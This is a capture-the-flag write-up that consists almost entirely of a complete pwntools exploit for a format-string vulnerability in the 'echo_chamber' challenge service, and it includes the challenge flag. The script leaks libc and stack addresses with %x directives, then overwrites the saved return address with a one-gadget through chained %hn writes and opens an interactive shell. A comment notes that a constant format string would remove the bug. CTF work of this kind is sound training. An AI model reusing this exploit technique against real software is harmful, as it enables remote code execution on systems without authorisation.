Tags: pwn 


Flag: `flag{something_with_tcache_ga48ghydgja}`

```
from pwn import *

# Target selection. With `local` set to True the script spawns the bundled
# binary with the shipped loader and libc preloaded, so the hard-coded libc
# offsets used later match; otherwise it connects to the remote service.
local = False

s = (
    process('./echo_chamber', env={'LD_PRELOAD': './ld-linux.so.2 ./libc.so.6'})
    if local
    else remote('echochamber.uni.hctf.fun', 13374)
)

# Pointer chain the positional directives rely on:
# %13 -> %61 -> %XXX (offset)
def put(value):
    """Store the 32-bit `value` in the stack slot that argument 61 points at.

    The value is written as two 16-bit halves. Before each half, a %hhn
    through argument 13 rewrites the lowest byte of the pointer held in
    argument 61 (to 0x4, then 0x6), so the following %hn through
    argument 61 lands on the low and then the high half of the slot.

    Sends four lines on the module-level tube `s`; returns nothing.
    """
    halves = (
        (0x4, value & 0xffff),  # low half of the slot
        (0x6, value >> 16),     # high half, two bytes further on
    )
    for low_byte, half in halves:
        # Re-aim argument 61 by patching only its least significant byte.
        s.sendline('%{}c%13$hhn'.format(low_byte))
        # The printed-character count becomes the 16-bit value stored.
        s.sendline('%{}c%61$hn'.format(half))

def write(what, where):
    """Write the 32-bit `what` to address `where` as two 16-bit stores.

    For each half, put() first plants the destination address in the
    controlled stack slot, then a %hn through positional argument
    `offset` stores the half at that address. `offset` is a module-level
    global that the script assigns before the first call.

    Sends its payloads on the module-level tube `s`; returns nothing.
    """
    for delta, half in ((0, what & 0xffff), (2, what >> 16)):
        put(where + delta)
        s.sendline('%{}c%{}$hn'.format(half, offset))

# NOTE(review): every payload in this script is a printf directive, so the
# service presumably passes the received line as the format string itself.
# A constant format string (printf("%s", buf)) removes both the %x leak and
# the %n writes used below - confirm against the binary.

# One probe line leaks three stack words, read back as 8 hex digits each.
s.sendline('%16$x%13$x%61$x')
s.recvline()

# Argument 16: treated as a libc pointer at a fixed distance from the base.
libc_leak = int(s.recv(8), 16)
libc_base = libc_leak - 0x1d8e24
# presumably a one-gadget offset for the shipped libc.so.6 - TODO confirm
one_shot = libc_base + 0x69854

# stack vars: the values held in positional arguments 13 and 61
s13 = int(s.recv(8), 16)
raw_s61 = int(s.recv(8), 16)
s61 = (raw_s61 & 0xffffff00) + 4  # alignment for put()

# Saved return address sits at a fixed distance below the leaked pointer.
ret_addr = s13 - 0x98
# Positional index of the slot at s61, counted in 4-byte stack words from
# argument 61 (Python 2 integer division keeps this an int).
offset = 61 + (s61 - s13) / 4

print 'ret @ ' + hex(ret_addr)
print 'libc @ ' + hex(libc_base)
print 'target offset = ' + str(offset)

write(one_shot, ret_addr)

# Three 'q' lines, then wait for the farewell message before going interactive.
for _ in range(3):
    s.sendline('q')

s.recvuntil('Bye.\n')
s.interactive()
```